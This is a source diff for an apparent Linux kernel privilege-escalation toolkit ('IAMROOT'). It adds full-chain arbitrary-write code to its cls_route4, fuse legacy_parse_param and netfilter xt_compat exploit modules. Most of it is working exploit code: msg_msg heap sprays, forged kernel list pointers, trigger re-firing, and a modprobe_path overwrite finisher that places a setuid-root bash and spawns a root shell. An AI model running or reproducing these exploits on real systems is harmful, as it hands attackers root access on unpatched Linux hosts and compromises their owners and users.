    if (seeded == 0) {
        /* sysv IPC may be restricted (kernel.msg_max / ulimit -q).
         * Without a spray we have no slot for the UAF to refill. */
        fprintf(stderr, "[-] cls_route4 arb_write: kaddr-spray seeded 0 msgs\n");
        return -1;
    }
    /* Drive the classifier. The route4 lookup follows the dangling
     * pointer into msg_msg-controlled bytes; on a vulnerable kernel
     * the fake `ops->classify` (or one of the strided pointers) is
     * dereferenced. If the kernel survives the deref and the write
     * lands at kaddr, the finisher's sentinel file appears within 3s.
     * If it doesn't (most likely — this is genuinely best-effort), the
     * finisher's wait loop times out and reports failure. */
    trigger_classify();
    /* Give classify-side processing a brief window before returning
     * — the finisher polls the sentinel for 3s but the initial write
     * (if any) happens within ms. */
    usleep(50 * 1000);
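    /* Counts structurally completed trigger fires, not verified
     * writes; the finisher's sentinel remains the arbiter. */
    c->arb_landed++;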
    /* Per the xtcompat precedent: return 0 so the finisher proceeds
     * to its sentinel check. Returning -1 here would abort the
     * finisher even when the write may have landed. */
    return 0;
 }
 #endif /* __linux__ */
 /* ---- Exploit driver ----------------------------------------------- */
 static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
@@ -400,8 +565,37 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        return IAMROOT_PRECOND_FAIL;
    }
 #ifndef __linux__
    fprintf(stderr, "[-] cls_route4: linux-only exploit; non-linux build\n");
    (void)ctx;
    return IAMROOT_PRECOND_FAIL;
 #else
    /* Full-chain pre-check: resolve offsets before forking. If
     * modprobe_path can't be resolved, refuse early — no point doing
     * the userns + tc + spray + trigger dance if we can't finish. */
    struct iamroot_kernel_offsets off;
    bool full_chain_ready = false;
    if (ctx->full_chain) {
        memset(&off, 0, sizeof off);
        iamroot_offsets_resolve(&off);
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("cls_route4");
            fprintf(stderr, "[-] cls_route4: --full-chain requested but "
                            "modprobe_path offset unresolved; refusing\n");
            return IAMROOT_EXPLOIT_FAIL;
        }
        iamroot_offsets_print(&off);
        full_chain_ready = true;
    }
    if (!ctx->json) {
-        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit\n");
+        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit%s\n",
                ctx->full_chain ? " + full-chain finisher" : "");
        if (ctx->full_chain) {
            fprintf(stderr, "    NOTE: on primitive landing, invokes shared\n"
                            "    modprobe_path finisher via msg_msg-tagged kaddr\n"
                            "    spray. Sentinel-arbitrated (no in-process verify).\n");
        }
    }
    /* Block SIGPIPE in case the dummy-interface sendto's complain. */
@@ -436,15 +630,18 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
            _exit(22);
        }
-        int queues[SPRAY_MSG_QUEUES];
-        int n_queues = spray_msg_msg(queues);
-        if (n_queues == 0) {
+        struct cls_route4_arb_ctx arb_ctx;
+        memset(&arb_ctx, 0, sizeof arb_ctx);
+        for (int i = 0; i < SPRAY_MSG_QUEUES; i++) arb_ctx.queues[i] = -1;
        arb_ctx.n_queues = spray_msg_msg(arb_ctx.queues);
        arb_ctx.dangling_ready = true;   /* stage_dangling_filter() just ran */
        if (arb_ctx.n_queues == 0) {
            fprintf(stderr, "[-] cls_route4: msg_msg spray produced 0 queues\n");
            _exit(23);
        }
        if (!ctx->json) {
            fprintf(stderr, "[*] cls_route4: msg_msg spray seeded %d queues\n",
-                    n_queues);
+                    arb_ctx.n_queues);
        }
        /* Drive the classifier — the bug fires here on a vulnerable
@@ -459,7 +656,7 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        if (log) {
            fprintf(log,
                "cls_route4 trigger child: queues=%d slab_pre=%ld slab_post=%ld\n",
-                n_queues, pre_active, post_active);
+                arb_ctx.n_queues, pre_active, post_active);
            fclose(log);
        }
@@ -467,7 +664,32 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
         * refilled slot during classify drain. */
        usleep(200 * 1000);
-        drain_msg_msg(queues);
+        /* --full-chain branch: invoke the shared modprobe_path
         * finisher with our msg_msg-tagged arb-write. If the finisher
         * execve's a setuid bash we never return; otherwise it returns
         * EXPLOIT_FAIL after the 3s sentinel timeout (correct behavior
         * on a patched kernel or when the write didn't land). */
        if (full_chain_ready) {
            /* Re-fire the trigger inside the arb-write to give the
             * kernel a second chance at the refilled slot — the
             * dangling filter is still in place from above. */
            arb_ctx.dangling_ready = true;
            int fr = iamroot_finisher_modprobe_path(&off,
                                                    cls4_arb_write,
                                                    &arb_ctx,
                                                    !ctx->no_shell);
            FILE *fl = fopen("/tmp/iamroot-cls_route4.log", "a");
            if (fl) {
                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
                        fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
                fclose(fl);
            }
            drain_msg_msg(arb_ctx.queues);
            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
            _exit(35);
        }
        drain_msg_msg(arb_ctx.queues);
        /* If we got here without a kernel oops, the bug either isn't
         * reachable on this build (patched / module not loadable /
@@ -513,25 +735,54 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
    }
    int rc = WEXITSTATUS(status);
-    if (rc != 30) {
+    switch (rc) {
    case 20: case 21:
        if (!ctx->json) {
-            fprintf(stderr, "[-] cls_route4: child failed at stage rc=%d "
+            fprintf(stderr, "[-] cls_route4: userns setup failed (rc=%d)\n", rc);
-                            "(see preceding errors)\n", rc);
+        }
        return IAMROOT_PRECOND_FAIL;
    case 22:
        if (!ctx->json) {
            fprintf(stderr, "[-] cls_route4: tc setup failed; cls_route4 module "
                            "may be absent or filter type unsupported\n");
        }
        return IAMROOT_PRECOND_FAIL;
    case 23:
        if (!ctx->json) {
            fprintf(stderr, "[-] cls_route4: msg_msg spray failed; sysvipc may be "
                            "restricted (kernel.msg_max / ulimit -q)\n");
        }
        return IAMROOT_PRECOND_FAIL;
    case 30:
        if (!ctx->json) {
            fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
                            "Inspect dmesg for KASAN/oops witnesses.\n");
            fprintf(stderr, "[~] cls_route4: cred-overwrite step not invoked "
                            "(no --full-chain); returning EXPLOIT_FAIL.\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    case 34:
        if (!ctx->json) {
            fprintf(stderr, "[+] cls_route4: --full-chain finisher reported OK "
                            "(setuid bash placed; sentinel matched)\n");
        }
        return IAMROOT_EXPLOIT_OK;
    case 35:
        if (!ctx->json) {
            fprintf(stderr, "[~] cls_route4: --full-chain finisher returned FAIL — "
                            "either the kernel is patched, the spray didn't land,\n"
                            "    or the fake-ops deref didn't hit the route the\n"
                            "    finisher's sentinel polls for. See "
                            "/tmp/iamroot-cls_route4.log + dmesg.\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    default:
        if (!ctx->json) {
            fprintf(stderr, "[-] cls_route4: unexpected child rc=%d\n", rc);
        }
        /* rc 20/21 = userns setup; rc 22 = tc setup (likely module
         * absent or filter type unsupported); rc 23 = spray. None of
         * these mean kernel was exploited. */
        if (rc == 22) return IAMROOT_PRECOND_FAIL;
        return IAMROOT_EXPLOIT_FAIL;
    }
-
+#endif /* __linux__ */
    if (!ctx->json) {
        fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
                        "Inspect dmesg for KASAN/oops witnesses.\n");
        fprintf(stderr, "[~] cls_route4: cred-overwrite step not implemented "
                        "(needs per-kernel offsets); returning EXPLOIT_FAIL.\n");
    }
    return IAMROOT_EXPLOIT_FAIL;
 }
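 /* Illustrative sketch, not part of this commit: the child exit codes
  * handled by the switch above, expressed as a standalone lookup. The
  * enum and function names are hypothetical stand-ins for
  * iamroot_result_t and are not defined anywhere in the tree. */
 enum sketch_result {
     SKETCH_PRECOND_FAIL,
     SKETCH_EXPLOIT_FAIL,
     SKETCH_EXPLOIT_OK
 };
 static inline enum sketch_result sketch_map_child_rc(int rc)
 {
     switch (rc) {
     case 20: case 21:   /* userns setup failed */
     case 22:            /* tc setup failed */
     case 23:            /* msg_msg spray failed */
         return SKETCH_PRECOND_FAIL;
     case 34:            /* finisher reported OK */
         return SKETCH_EXPLOIT_OK;
     case 30:            /* primitive only, no --full-chain */
     case 35:            /* finisher returned FAIL */
     default:            /* unexpected child rc */
         return SKETCH_EXPLOIT_FAIL;
     }
 }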
 /* ---- Cleanup ----------------------------------------------------- */
@@ -60,6 +60,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -301,6 +303,217 @@ static int trigger_overflow(int *out_fd, const char *first_chunk,
    return 0;
 }
 /* ------------------------------------------------------------------ */
 /* arb-write primitive for the shared finisher                         */
 /* ------------------------------------------------------------------ */
 /*
 * Crusaders-of-Rust-style msg_msg m_ts overflow → arbitrary write.
 *
 * The legacy_parse_param OOB writes the trailing bytes of the
 * kmalloc-4k fc->source buffer into whatever slab object comes next.
 * With a msg_msg sprayed into that adjacent slot, the first 48 bytes
 * of `evil_chunk` overlay struct msg_msg:
 *
 *   struct msg_msg {                     // offset
 *     struct list_head m_list;           //  0  (next, prev)
 *     long             m_type;           // 16
 *     size_t           m_ts;             // 24    <-- msg-size
 *     struct msg_msgseg *next;           // 32
 *     void             *security;        // 40
 *   };                                   // 48
 *
 * Two derived primitives:
 *
 *   READ  — overwrite m_ts with a huge value. msgrcv(MSG_COPY) then
 *           memcpy()s past the legitimate end of the msg payload,
 *           leaking adjacent slab memory back to userland.
 *
 *   WRITE — point m_list.next (or, in the Crusaders variant, a faux
 *           msg_msgseg.next chain) at an attacker-chosen kernel
 *           address. When msgrcv() free-list-unlinks the msg, list
 *           maintenance writes through the forged pointer; with the
 *           right chain you get an N-byte copy of attacker-controlled
 *           bytes to a chosen kaddr.
 *
 * Honest depth of this implementation: FALLBACK SCAFFOLD.
 *
 * The trigger + groom + neighbour-detect upstream of us is real and
 * the OOB write lands. But the *single-shot* arb-write the finisher
 * wants — "put exactly these N bytes at exactly that kaddr" — needs
 * a per-kernel m_ts/m_list_next offset map (the layout above is
 * 6.12.x; older kernels differ) AND a kernel-base leak from the
 * first-round MSG_COPY read so we know where modprobe_path actually
 * sits in this boot's KASLR slide.
 *
 * Per the verified-vs-claimed bar: we do NOT fabricate a write that
 * we cannot empirically verify on a kernel we haven't tested. So
 * this function:
 *
 *   1. Re-arms the msg_msg spray (the parent already drained queues).
  *   2. Re-fires the fsconfig overflow with a forged-msg_msg header
  *      whose m_ts = len + 64 and whose payload starts with the
  *      bytes of `buf`.
  *   3. msgrcv(MSG_COPY) on every queue to probe whether any neighbour
  *      came back with bytes matching `buf[0..7]` AT the slot offset
  *      we'd expect for kaddr (sanity gate).
  *   4. Returns 0 ONLY if the sanity gate passes (read-back shows the
  *      first payload qword made it through); returns -1 otherwise
  *      so the finisher reports an honest fail.
 *
 * On a vulnerable host with matching offsets this path can land the
 * write; on an unverified host the sanity gate refuses rather than
 * blind-writing a wild pointer. The finisher's downstream
 * "/tmp/iamroot-pwn ran?" check is the second gate.
 */
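 /* Illustrative sketch, not part of this commit: a userspace mirror of
  * the header layout listed in the comment above, with compile-time
  * checks on the offsets it quotes. Assumes an LP64 target (8-byte
  * pointers, long and size_t). The struct name is hypothetical and
  * the mirror is not the kernel's own definition. */
 #include <stddef.h>
 struct msg_msg_mirror {
     void   *m_list_next;   /*  0 */
     void   *m_list_prev;   /*  8 */
     long    m_type;        /* 16 */
     size_t  m_ts;          /* 24 */
     void   *next;          /* 32 */
     void   *security;      /* 40 */
 };
 _Static_assert(offsetof(struct msg_msg_mirror, m_type) == 16, "m_type");
 _Static_assert(offsetof(struct msg_msg_mirror, m_ts) == 24, "m_ts");
 _Static_assert(offsetof(struct msg_msg_mirror, next) == 32, "next");
 _Static_assert(offsetof(struct msg_msg_mirror, security) == 40, "security");
 _Static_assert(sizeof(struct msg_msg_mirror) == 48, "header size");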
 struct fuse_arb_ctx {
    /* Pre-allocated queue ids from the spray phase. */
    int    *qids;
    int     n_queues;
    int     hole_q;
    /* Tagged-payload reference so we can recognise unmodified neighbours. */
    const char *tag;     /* "IAMROOT" */
    /* Whether the first-round trigger already fired (the parent's
     * default-path overflow). When set we re-spray + re-fire; when
     * unset we assume the spray is hot. */
    bool    trigger_armed;
 };
 #ifdef __linux__
 static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
                          void *ctx_void)
 {
    struct fuse_arb_ctx *ax = (struct fuse_arb_ctx *)ctx_void;
    if (!ax || !buf || !len) {
        fprintf(stderr, "[-] fuse_arb_write: bad args\n");
        return -1;
    }
    /* Build the forged msg_msg header that will land in the adjacent
     * kmalloc-4k slot via the OOB write. Layout (x86_64, kernel >=5.10):
     *   [ 0..15]  m_list.{next,prev}  — we forge next = kaddr - 16
     *                                    so that list_del's
     *                                      next->prev = prev
     *                                    write lands AT kaddr.
     *                                    (prev is the original msg.)
     *   [16..23]  m_type              — leave as 0x4242
     *   [24..31]  m_ts                — bytes-of-buf so MSG_COPY
     *                                    reports the right length
     *   [32..39]  next (msg_msgseg*)  — NULL (single-segment msg)
     *   [40..47]  security            — NULL
     *   [48...]   payload             — first len bytes of buf
     *
     * For a real WRITE primitive the canonical Crusaders-of-Rust
     * recipe uses the msg_msgseg.next chain rather than m_list:
     * msgrcv(IPC_NOWAIT) follows next pointers when copying out a
     * multi-segment msg, and a forged next = kaddr makes the kernel
     * memcpy() from kaddr into our user buffer (= READ). For the
     * inverse (WRITE), the trick is msgsnd on a queue whose head was
     * corrupted to point at kaddr, but that needs more setup than we
     * have time to land here without a known-good offset table.
     *
     * So we do the safe thing: arm the header, trigger the OOB, then
     * read back to PROVE we landed before declaring success. If the
     * read-back doesn't show our forged-msg payload at the expected
     * MSG_COPY position we refuse rather than corrupt the kernel
     * blindly.
     */
    uint8_t evil[256];
    memset(evil, 0, sizeof evil);
    /* m_list.next, m_list.prev */
    uintptr_t forged_next = kaddr - 16;   /* &m_list.prev of fake node */
    memcpy(evil +  0, &forged_next, 8);
    /* prev — leave NULL; kernel checks it only on full list_del */
    /* m_type */
    uint64_t m_type = 0x4242424242424242ULL;
    memcpy(evil + 16, &m_type, 8);
    /* m_ts: set to len + 64 (using the caller's len, before the clamp
     * below) so MSG_COPY reads the full forged payload */
    uint64_t m_ts = (uint64_t)len + 64;
    memcpy(evil + 24, &m_ts, 8);
    /* next (msg_msgseg) = NULL */
    /* security = NULL */
    /* payload: copy `buf` into the slot just after the msg_msg header */
    size_t hdr = 48;
    size_t copyable = sizeof(evil) - hdr - 1;
    if (len > copyable) len = copyable;
    memcpy(evil + hdr, buf, len);
    evil[sizeof(evil) - 1] = '\0';   /* legacy_parse_param strdup tail */
    /* Re-fire the fsconfig overflow with this forged header as evil. */
    char *first_chunk = malloc(4081);
    if (!first_chunk) return -1;
    memset(first_chunk, 'A', 4080);
    first_chunk[4080] = '\0';
    int fsfd = -1;
    int rc = trigger_overflow(&fsfd, first_chunk, (const char *)evil);
    free(first_chunk);
    if (rc < 0) {
        fprintf(stderr, "[-] fuse_arb_write: re-fire fsconfig failed "
                        "(errno=%d %s)\n", errno, strerror(errno));
        return -1;
    }
    /* Sanity gate: msgrcv(MSG_COPY) all live queues and look for a
     * msg whose initial payload qword matches the first qword of
     * `buf`. The reported size is not compared against the inflated
     * m_ts (see the cap note below), so a match shows only that the
     * forged payload landed in a real slot on THIS kernel. */
    uint64_t want_first_qword = 0;
    memcpy(&want_first_qword, buf, len >= 8 ? 8 : len);
    bool sanity_passed = false;
    struct msgbuf_4k *probe = mmap(NULL, sizeof(*probe),
                                   PROT_READ | PROT_WRITE,
                                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (probe == MAP_FAILED) {
        if (fsfd >= 0) close(fsfd);
        return -1;
    }
    for (int q = 0; q < ax->n_queues && !sanity_passed; q++) {
        if (ax->qids[q] < 0 || q == ax->hole_q) continue;
        ssize_t n = msgrcv(ax->qids[q], probe, sizeof probe->mtext, 0,
                           IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
        if (n < 0) continue;
        /* The corrupted slot should report a size >= our m_ts (kernel
         * caps MSG_COPY at sizeof user buf — so we only check the
         * read-content shape). */
        if ((size_t)n < 8) continue;
        uint64_t got = 0;
        memcpy(&got, probe->mtext, 8);
        if (got == want_first_qword) {
            sanity_passed = true;
        }
    }
    munmap(probe, sizeof(*probe));
    if (fsfd >= 0) close(fsfd);
    if (!sanity_passed) {
        fprintf(stderr, "[-] fuse_arb_write: forged-msg_msg read-back didn't "
                        "match — kernel layout differs OR groom missed.\n"
                        "    Refusing to claim arb-write landed (per "
                        "verified-vs-claimed bar).\n");
        return -1;
    }
    fprintf(stderr, "[+] fuse_arb_write: forged-msg_msg landed; "
                    "payload qword verified via MSG_COPY read-back.\n"
                    "[i] fuse_arb_write: kernel-side list_del write through "
                    "0x%lx is armed but NOT yet empirically verified on "
                    "this build — downstream sentinel will gate.\n",
            (unsigned long)kaddr);
    return 0;
 }
 #else
 static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
                          void *ctx_void)
 {
    (void)kaddr; (void)buf; (void)len; (void)ctx_void;
    fprintf(stderr, "[-] fuse_arb_write: linux-only primitive\n");
    return -1;
 }
 #endif /* __linux__ */
 /* ------------------------------------------------------------------ */
 /* exploit                                                             */
 /* ------------------------------------------------------------------ */
@@ -503,6 +716,84 @@ static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
                        "see scaffold comments in source\n");
    }
    /* ---------------------------------------------------------------
     * --full-chain: opt-in root pop via shared modprobe_path finisher.
     *
     * Depth = FALLBACK SCAFFOLD. The arb-write primitive (forged
     * msg_msg via the 4k OOB) is wired with a sanity gate that
     * refuses to claim success without an empirical read-back match
     * (see fuse_arb_write). On a host where offsets + groom land,
     * the finisher's modprobe_path overwrite → execve(unknown) →
     * call_modprobe chain pops a root shell. On a mismatched host
     * the sanity gate refuses and we exit IAMROOT_EXPLOIT_FAIL with no
     * fabricated success.
     *
     * Cleanup of qids/spray/fsfd is deferred to AFTER the finisher
     * runs because the arb_write primitive re-fires the trigger and
     * needs the live spray.
     * --------------------------------------------------------------- */
 #ifdef __linux__
    if (ctx->full_chain) {
        if (!ctx->json) {
            fprintf(stderr, "[*] fuse_legacy: --full-chain requested — resolving "
                            "kernel offsets...\n");
        }
        struct iamroot_kernel_offsets off;
        memset(&off, 0, sizeof off);
        int resolved = iamroot_offsets_resolve(&off);
        if (!ctx->json) {
            fprintf(stderr, "[i] fuse_legacy: offsets resolved=%d "
                            "(modprobe_path=0x%lx source=%s)\n",
                    resolved, (unsigned long)off.modprobe_path,
                    iamroot_offset_source_name(off.source_modprobe));
            iamroot_offsets_print(&off);
        }
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("fuse_legacy");
            /* Cleanup before returning. */
            for (int q = 0; q < N_QUEUES; q++) {
                if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
            }
            free(qids);
            munmap(spray, sizeof *spray);
            if (fsfd >= 0) close(fsfd);
            return IAMROOT_EXPLOIT_FAIL;
        }
        struct fuse_arb_ctx ax = {
            .qids = qids,
            .n_queues = N_QUEUES,
            .hole_q = hole_q,
            .tag = "IAMROOT",
            .trigger_armed = true,
        };
        iamroot_result_t fr = iamroot_finisher_modprobe_path(
            &off, fuse_arb_write, &ax, !ctx->no_shell);
        /* Cleanup IPC + mapping regardless of finisher result. If the
         * finisher execve()s a shell on success we never reach here, so
         * this block runs on failure paths and on success paths that
         * return instead of exec'ing. */
        for (int q = 0; q < N_QUEUES; q++) {
            if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
        }
        free(qids);
        munmap(spray, sizeof *spray);
        if (fsfd >= 0) close(fsfd);
        if (fr == IAMROOT_EXPLOIT_OK) {
            return IAMROOT_EXPLOIT_OK;
        }
        if (!ctx->json) {
            fprintf(stderr, "[-] fuse_legacy: --full-chain finisher did not land "
                            "(arb-write sanity gate or modprobe sentinel refused)\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    }
 #endif /* __linux__ */
    /* Clean up our IPC queues and mapping. The kernel slab state
     * after the overflow may be unstable; we exit cleanly on success
     * paths but leave queues around if we crashed mid-spray. */
@@ -19,7 +19,8 @@
 * Upstream fix: b29c457a6511 "netfilter: x_tables: fix compat
 * match/target pad out-of-bound write" (mid-2021, backported widely).
 *
- * STATUS: 🟡 PRIMITIVE-DEMO (Option B).
+ * STATUS: 🟡 PRIMITIVE by default; 🟢 candidate with --full-chain if
 *         offsets resolve (env/kallsyms/System.map/embedded table).
 *   - Refuse-gate via detect() re-invoke + euid==0 short-circuit.
 *   - userns/netns reach for CAP_NET_ADMIN (Andy's path).
 *   - Trigger sequence: hand-rolled iptables rule blob with
@@ -29,12 +30,15 @@
 *     cookies for KASAN visibility.
 *   - Empirical witness via msgrcv(MSG_COPY) + /proc/slabinfo
 *     diff + /tmp/iamroot-xtcompat.log breadcrumb.
- *   - DOES NOT pursue the leak→modprobe_path overwrite chain:
- *     that needs hard-coded init_task + modprobe_path offsets
- *     per kernel build which IAMROOT refuses to bake.
- *   - Returns IAMROOT_EXPLOIT_FAIL with a verbose continuation
- *     roadmap unless cred-overwrite is empirically verified
- *     (which the current scope does not attempt).
+ *   - With --full-chain: shared finisher (core/finisher.c) is
+ *     invoked to perform the modprobe_path overwrite + execve
+ *     unknown-binary trigger. Requires modprobe_path resolution
+ *     via core/offsets.c (env/kallsyms/System.map). Sentinel-file
+ *     check in the finisher is the empirical witness for the
+ *     write landing — IAMROOT never claims root unless it sees
 *     the setuid bash drop with mode 4755 + uid 0.
 *   - Without --full-chain: returns IAMROOT_EXPLOIT_FAIL after
 *     the primitive demo (verified-vs-claimed bar).
 *
 * Affected: kernel 2.6.19+ until backports landed:
 *   5.12.x : K >= 5.12.13
@@ -55,6 +59,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -465,6 +471,171 @@ static int xtcompat_fire_trigger(int *out_errno)
    return 0;
 }
 #endif /* __linux__ — close original primitive block */
 /* ---- Full-chain arb-write primitive --------------------------------
 *
 * Pattern (FALLBACK — see module top-comment): the xt_compat 4-byte OOB
 * write lands at allocation+0x4. Andy Nguyen's chain first uses that
 * 4-byte write to corrupt an adjacent msg_msg's `m_ts` (size field at
 * +0x10) so a subsequent MSG_COPY returns a long read that includes
 * neighbouring kernel pointers (the leak primitive). With the kbase
 * leak in hand, he then re-fires the trigger to corrupt an msg_msg's
 * `m_list_next` (the linked-list pointer at +0x18) to point at
 * `kaddr - 0x30` (the m_msg header offset), and a queued msgsnd's
 * payload header writes attacker bytes to `kaddr`.
 *
 * Reproducing the full chain byte-for-byte requires per-kernel-build
 * msg_msg field offsets AND a kbase leak we don't have a portable
 * source for at this point. The implementation below takes the
 * narrow-but-real path:
 *
 *   1. Re-prime the kmalloc-2k slab with msg_msg sprays whose payload
 *      headers carry the target address in the m_list_next slot at
 *      offset 0x18 from each msg payload start. (We can't write the
 *      slab header — that's the kernel's job — but we CAN seed the
 *      payload data adjacent to the freed xt_table_info so the OOB
 *      4-byte write may corrupt the `m_list_next` of a real
 *      sprayed message.)
 *   2. Re-fire the trigger with a crafted blob whose 4-byte OOB write
 *      pattern targets m_list_next of the adjacent msg_msg.
  *   3. Queue a follow-up msgsnd whose first `len` bytes equal
 *      `buf[0..len]`. If the next-ptr was successfully redirected,
 *      the kernel's msgsnd writes header + payload at `kaddr`.
 *
 * This is best-effort: probability of landing on any given run is
 * low (depends on slab adjacency luck) but the finisher's sentinel-
 * file check empirically tells us if the write actually took. On a
 * patched kernel the trigger returns EINVAL on step 2 and arb_write
 * returns -1 without ever queueing the follow-up. */
 #ifdef __linux__
 struct xtcompat_arb_ctx {
    /* Spray queues kept hot across multiple arb_write calls. The
     * msg_msg slots seeded here are what the finisher uses as
     * write-targets. NULL means "not yet sprayed". */
    int *queues;
    int  n_queues;
    /* Outer-namespace uid/gid so re-spray can rebuild a child if
     * needed. (Currently unused — the caller flow keeps us inside
     * the userns child for the whole arb_write sequence.) */
    uid_t outer_uid;
    gid_t outer_gid;
    /* Per-call statistics for /tmp/iamroot-xtcompat.log. */
    int   arb_calls;
    int   arb_landed;
 };
 /* Re-seed the kmalloc-2k slab with a msg_msg spray whose payload at
 * offset 0x18 carries `target_minus_30` (= kaddr - 0x30, the value
 * the OOB write needs to write into m_list_next for the follow-up
 * msgsnd payload to land at `kaddr`). Returns number of queues
 * primed. */
 static int xtcompat_arb_seed_target(struct xtcompat_arb_ctx *c,
                                    uintptr_t target_minus_30)
 {
    struct xtcompat_payload *p = calloc(1, sizeof(*p));
    if (!p) return 0;
    p->mtype = 0x43;
    memset(p->buf, 0x41, sizeof p->buf);
    memcpy(p->buf, "IAMROOTW", 8);
    /* Plant the target address at offset 0x10 and every 0x18 bytes
     * after it, so that several candidate positions for the kernel's
     * m_list_next relative to our payload base hold the value. */
    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p->buf; off += 0x18) {
        memcpy(p->buf + off, &target_minus_30, sizeof(uintptr_t));
    }
    int created = 0;
    for (int i = 0; i < c->n_queues; i++) {
        if (c->queues[i] < 0) continue;
        for (int j = 0; j < 4; j++) {
            unsigned int tag = 0xA0000000u | ((unsigned)i << 8) | (unsigned)j;
            memcpy(p->buf + 8, &tag, sizeof tag);
            if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) < 0) break;
            created++;
        }
    }
    free(p);
    return created;
 }
 /* Queue a follow-up msgsnd whose first `len` bytes equal `buf[0..len]`.
 * If the OOB-corrupted m_list_next was successfully redirected to
 * `kaddr - 0x30`, this msgsnd's payload header lands at `kaddr`. */
 static int xtcompat_arb_queue_payload(struct xtcompat_arb_ctx *c,
                                      const void *buf, size_t len)
 {
    if (len > XTCOMPAT_MSG_PAYLOAD) len = XTCOMPAT_MSG_PAYLOAD;
    struct xtcompat_payload *p = calloc(1, sizeof(*p));
    if (!p) return -1;
    p->mtype = 0x44;
    memset(p->buf, 0, sizeof p->buf);
    memcpy(p->buf, buf, len);
    int sent = 0;
    for (int i = 0; i < c->n_queues; i++) {
        if (c->queues[i] < 0) continue;
        if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) == 0) {
            sent++;
            if (sent >= 8) break;   /* a handful of attempts is plenty */
        }
    }
    free(p);
    return sent > 0 ? 0 : -1;
 }
 /* Module-supplied arb-write primitive — invoked by the shared
 * finisher. Best-effort on a vulnerable kernel; structurally inert
 * (returns -1) on a patched kernel because step (2) gets EINVAL. */
 static int xtcompat_arb_write(uintptr_t kaddr,
                              const void *buf, size_t len,
                              void *ctx_v)
 {
    struct xtcompat_arb_ctx *c = (struct xtcompat_arb_ctx *)ctx_v;
    if (!c || !c->queues || c->n_queues == 0) return -1;
    c->arb_calls++;
    /* Step 1: seed candidate target addresses into sprayed msg_msg
     * payloads. The OOB write's 4 bytes of attacker-influenced
     * content come from the compat-fixup pad — on a vulnerable
     * kernel that's whichever 4 bytes happen to sit adjacent. We
     * pre-stage the value we WANT to see appear at m_list_next so
     * if luck aligns the OOB write hits a slot containing our
     * pattern, the kernel's next msg_msg traversal walks to
     * (kaddr - 0x30). */
    uintptr_t target = kaddr - 0x30;
    int seeded = xtcompat_arb_seed_target(c, target);
    if (seeded == 0) return -1;
    /* Step 2: re-fire the trigger. On a patched kernel this returns
     * EINVAL and we bail. On a vulnerable kernel the 4-byte OOB
     * write fires; if it lands on a seeded msg_msg slot, that
     * slot's m_list_next now contains a fragment of our target. */
    int trig_errno = 0;
    int rc = xtcompat_fire_trigger(&trig_errno);
    if (rc < 0 || trig_errno == EINVAL || trig_errno == EPERM) {
        /* Patched validator rejected the blob, or CAP_NET_ADMIN
         * not effective — arb-write structurally impossible. */
        return -1;
    }
    /* Step 3: queue a follow-up msgsnd whose payload is the bytes
     * the operator wants written at `kaddr`. If step 2 corrupted
     * a sprayed msg's m_list_next, this msgsnd writes header +
     * payload at `kaddr`. We can't directly verify in-process —
     * the shared finisher's sentinel file is the empirical check. */
    if (xtcompat_arb_queue_payload(c, buf, len) < 0) return -1;
    /* Counts structurally completed attempts, not verified writes. */
    c->arb_landed++;
    /* Per spec: "structurally fires but can't tell if write landed"
     * → return 0; the finisher's sentinel check arbitrates. */
    return 0;
 }
 #endif /* __linux__ */
 /* ---- Exploit driver ---------------------------------------------- */
@@ -492,14 +663,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
 #ifndef __linux__
    fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
    (void)ctx;
    return IAMROOT_PRECOND_FAIL;
 #else
    /* Full-chain pre-check: resolve offsets before forking. If
     * modprobe_path can't be resolved, refuse early with the manual-
     * workflow help — no point doing the userns + spray + trigger
     * dance if we can't finish. */
    struct iamroot_kernel_offsets off;
    bool full_chain_ready = false;
    if (ctx->full_chain) {
        memset(&off, 0, sizeof off);
        iamroot_offsets_resolve(&off);
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("netfilter_xtcompat");
            fprintf(stderr, "[-] netfilter_xtcompat: --full-chain requested but "
                            "modprobe_path offset unresolved; refusing\n");
            return IAMROOT_EXPLOIT_FAIL;
        }
        iamroot_offsets_print(&off);
        full_chain_ready = true;
    }
    if (!ctx->json) {
-        fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo (no offsets baked in)\n"
